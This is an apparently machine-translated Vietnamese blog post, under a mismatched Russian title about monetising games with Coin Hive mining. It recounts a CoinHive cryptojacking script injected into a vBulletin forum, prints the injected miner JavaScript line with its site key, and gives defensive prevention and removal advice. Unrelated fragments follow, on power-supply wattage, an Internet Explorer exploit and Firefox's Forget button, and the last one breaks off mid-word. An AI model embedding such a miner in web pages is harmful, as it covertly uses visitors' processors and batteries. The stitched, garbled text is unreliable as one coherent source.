Монетизация Unity3D HTML5 игр и приложений с помощью майнинга Coin Hive Monero
Mục lục:
Kịch bản khai thác mật mã coinhive
Hôm qua khi tôi truy cập Diễn đàn TWC của chúng tôi, chạy trên phần mềm vBulletin, phần mềm bảo mật của tôi đã đưa ra cảnh báo này:
// coinhive dot com /lib/coinhive.js Tệp đối tượng được phát hiện, tải xuống bị chặn
Tôi thường truy cập diễn đàn hàng ngày và tôi đã không nhìn thấy nó ngày hôm trước. Vì vậy, tôi giả định rằng điều này đã xảy ra một số thời gian trong đêm, thời gian của tôi, khi tôi đang ngủ.
Tôi sử dụng phần mềm vBulletin cho diễn đàn, và nó đã được cập nhật lên phiên bản mới nhất. Hơn nữa, điều này khá bất ngờ đối với chúng tôi, vì miền TheWindowsClub.com sử dụng
Web Antivirus & Firewall để bảo vệ bản thân khỏi các mối đe dọa và tấn công trên web. Phần mềm bảo mật máy tính của tôi đã chặn thành công tập lệnh độc hại khỏi hoạt động trên máy tính Windows 10 của tôi. Tôi đã kiểm tra với các trình duyệt khác như Chrome & Edge và kết quả giống nhau.
Sau khi nhấp chuột phải vào trang web diễn đàn và kiểm tra mã nguồn, tôi thấy rằng đó là một tập lệnh độc hại của CryptoMiner của CoinHive.
Đây là Javascript Coinhive độc hại đã có trong mã diễn đàn của tôi:
var miner = new CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();
Dù sao, điều đầu tiên tôi làm là lấy diễn đàn và thông báo cho Sucuri.
Các thành viên của Sucuri đã làm sạch diễn đàn của tập lệnh Coinhive đã được đưa vào diễn đàn của tôi sau vài giờ, và tất cả
đều ổn. CoinHive
Coinhive là gì một thợ mỏ JavaScript cho tiền điện tử Monero mà bạn có thể nhúng vào trang web của bạn và sử dụng CPU của máy tính khách truy cập trang web để khai thác tiền xu cho bạn.
Điều này được gọi là
Cryptojacking . Nó liên quan đến việc cướp các trình duyệt của người dùng để khai thác tiền điện tử. Một số chủ sở hữu trang web có thể sử dụng nó để kiếm tiền - nhưng trong trường hợp của chúng tôi, nó đã được tiêm. Khi người dùng truy cập trang web bị nhiễm, JavaScript Coinhive thực hiện và khai thác Monero sử dụng tài nguyên CPU của người dùng. Điều này có thể dẫn đến sự cố hệ thống điều chỉnh CPU và không mong muốn của máy tính nạn nhân.
Bây giờ nếu trình duyệt của bạn bị nhiễm, bạn sẽ thấy việc sử dụng tài nguyên của bạn tăng lên. Đóng trình duyệt và trình duyệt sẽ thả xuống. Người dùng có thể thấy máy của mình nóng lên, quạt chạy nhanh hoặc pin cạn nhanh.
Tôi nhờ đồng nghiệp Saurabh Mukhekar ghé thăm diễn đàn của tôi bằng
Mac và xem chuyện gì đã xảy ra. Vâng, máy tính Mac của anh cũng bị ảnh hưởng khi anh mở diễn đàn bằng Safari! Anh là một trong những người dùng Mac OSX thông minh sử dụng phần mềm chống vi-rút cho máy Mac của mình. Avast antivirus cho Mac đã chặn thành công tập lệnh nguy hiểm khi chạy. Saidabh Saidabh, 
Phần mềm độc hại CoinHive không chỉ tấn công một máy tính Windows mà còn cả Mac, vì nó là trình duyệt Javascript. Nó là tốt tôi không tin vào huyền thoại rằng máy Mac không cần một phần mềm chống virus, máy khác của tôi sẽ bị nhiễm và máy Mac của tôi sẽ tiếp tục tung ra tiền xu cho người khác.
Ngăn CoinHive xâm nhập vào trang web của bạn
Không sử dụng bất kỳ mẫu hoặc plugin NULL nào trên trang web / diễn đàn của bạn.
- Cập nhật CMS của bạn lên phiên bản mới nhất.
- Cập nhật phần mềm lưu trữ thường xuyên (PHP, Cơ sở dữ liệu, v.v.).
- Bảo mật trang web của bạn với các nhà cung cấp bảo mật web như Sucuri, Cloudflare, Wordfence, v.v.
- Thực hiện các biện pháp phòng ngừa cơ bản để bảo mật blog của bạn.
- Xóa bỏ CoinHive khỏi trang web
Trước hết, bạn cần phải là quản trị viên web của trang web bị nhiễm - hoặc có các thông tin quản trị cung cấp cho bạn quyền truy cập vào tất cả các tệp của trang web.
Bây giờ khi chương trình chống vi-rút của bạn phát hiện thấy nhiễm trùng CoinHive, hãy nhấp chuột phải vào trang web và chọn
Xem mã nguồn. Tiếp theo nhấn Ctrl + F và tìm kiếm "CoinHive". Khi bạn đã xác định vị trí của mã độc, bạn cần xem vị trí của nó - vị trí của nó. Bây giờ bạn cần phải loại bỏ nó bằng tay. Để làm điều này, bạn cần một chút kiến thức mã hóa nền tảng của bạn. Bạn sẽ phải xác định vị trí các tập tin bị nhiễm / s và loại bỏ bằng tay kịch bản trên từ nó. Nếu bạn không chắc chắn về nó, xin vui lòng yêu cầu một số chuyên gia để làm điều đó. Vì chúng tôi sử dụng Sucuri, chúng tôi cho phép họ làm điều đó.
Làm như vậy, xóa bộ nhớ cache máy chủ và trình duyệt của bạn. Nếu bạn đang sử dụng bất kỳ plugin bộ nhớ cache nào hoặc nói MaxCDN, hãy xóa những bộ nhớ cache đó.
Bảo vệ bạn khỏi các tập lệnh khai thác mật mã
Mật mã và công nghệ Blockchain đang chiếm lĩnh thế giới. Nó đang tạo ra một tác động đến nền kinh tế toàn cầu và gây ra sự gián đoạn công nghệ. Mọi người đã bắt đầu tập trung vào một thị trường béo bở như vậy - và điều này bao gồm cả tin tặc trang web. Khi tăng lợi nhuận, chúng ta nên kỳ vọng rằng các công nghệ như vậy sẽ bị lạm dụng. Đó là mặt tối của bất kỳ công nghệ mới nổi nào.
Điều chúng ta có thể làm là thực hiện các biện pháp phòng ngừa tốt nhất có thể vào mọi lúc. Ngoài việc sử dụng phần mềm bảo mật tốt, hãy sử dụng tiện ích mở rộng của Chrome hoặc Firefox chặn các trang web sử dụng CPU của bạn để khai thác tiền điện tử - hoặc tốt hơn, hãy sử dụng Anti-WebMiner để ngăn chặn các cuộc tấn công của Cryptojacking Mining Script bằng cách sửa đổi tệp Máy chủ lưu trữ của bạn. Nó hoạt động trên tất cả các trình duyệt. Nếu bạn là người dùng Mac, hãy sử dụng phần mềm chống vi-rút cho máy tính của bạn.
Như một biện pháp phòng ngừa phong phú, nếu bạn cảm thấy có thể đã truy cập trang web bị nhiễm, bạn nên xóa trình duyệt của mình cache và quét máy tính của bạn bằng phần mềm diệt virus cũng như AdwCleaner.
Giữ an toàn, luôn tỉnh táo!
Không có gì để tính toán số lượng watt máy tính của bạn sẽ cần để hoạt động đúng. Bạn tổng cộng nhu cầu điện năng của bộ xử lý, bo mạch chủ, card video và âm thanh của bạn, và mọi thứ khác bên trong máy tính của bạn, với sức chứa của một bộ nguồn điện có giá phải chăng và bạn có nó. Tất nhiên, bạn phải biết nhu cầu điện năng của bộ xử lý, bo mạch chủ, card video và card âm thanh của bạn, và mọi thứ khác bên trong máy tính của bạn, nhưng cuộc sống là gì nếu không có những thách thức.
Trên thực tế, bạn không. Trang web của nhà sản xuất chắc chắn sẽ bao gồm những thông số kỹ thuật đó. Vì vậy, các trang web cho nhiều cửa hàng bán các đơn vị.
Dump Internet Explorer cho đến khi Microsoft phát hành bản vá lỗi, các chuyên gia bảo mật cảnh báo. Nếu bạn sử dụng Internet Explorer 6, 7, 8 hoặc 9 làm trình duyệt mặc định trên PC Windows, các chuyên gia bảo mật khuyên bạn nên sử dụng một trình duyệt Web khác cho đến khi Microsoft vá lỗ hổng nghiêm trọng trong IE. Hôm thứ Hai, Microsoft đã xác nhận rằng tin tặc đã tích cực khai thác lỗ hổng IE có thể cho phép kẻ tấn công chiếm đoạt PC của bạn. Việc khai thác không ảnh hưởng đến người dùng đang
Cho đến nay, Microsoft cho biết họ đã nhận được các báo cáo về "một số lượng nhỏ các cuộc tấn công nhắm mục tiêu" bằng cách sử dụng khai thác này. Các nhà sản xuất phần mềm đang làm việc trên một bản vá bảo mật cho vấn đề, nhưng công ty vẫn chưa nói liệu nó sẽ phát hành một bản cập nhật bảo mật càng sớm càng tốt hoặc là một phần của chu kỳ cập nhật “patch Tuesday” hàng tháng của họ. "Bản vá thứ ba" tiếp theo sẽ là ngày 9 tháng 10.
Nút Quên mới trong Firefox cho phép bạn kiểm soát nhiều hơn quyền riêng tư của mình. Hầu hết các trình duyệt web cho Windows cho phép bạn xóa lịch sử duyệt web nhưng bản cập nhật gần đây cho trình duyệt phổ biến này đã thêm tính năng bảo mật mới tuyệt vời cho phép bạn xóa lịch sử duyệt web của mình ngay lập tức trong một lần nhấp - thậm chí cho phép bạn xác định khoảng thời gian. Nút
Quên